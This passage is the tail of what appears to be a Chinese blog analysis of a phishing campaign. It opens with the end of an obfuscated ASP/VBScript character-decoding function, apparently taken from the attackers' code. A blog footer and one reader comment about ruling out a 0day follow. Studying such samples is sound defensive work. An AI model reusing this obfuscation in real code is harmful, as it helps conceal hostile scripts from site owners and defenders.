EE_EEE = EE_EEE & Chr(EE_E___ - 47)
Else
xml_request_fun_ = E__E___ + 1
If Mid(EEEE___, xml_request_fun_, 1) = EE_EEE("o") Then EE_EEE = EE_EEE & ChrW(EE_E___ + 5) Else EE_EEE = EE_EEE & Mid(EEEE___, E__E___, 1)
End If
End If
Next
End Function
%>

    转载请注明:jinglingshu的博客 » 关于”马爷”网络钓鱼的分析报告

    与本文相关的文章

    发表我的评论
    取消评论

    表情

    Hi,您需要填写昵称和邮箱!

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址

    网友最新评论 (1)

    1. 为什么要进行以上的分析统计呢: 排除攻击者使用0day攻击的可能性
      admin11年前 (2014-01-21)回复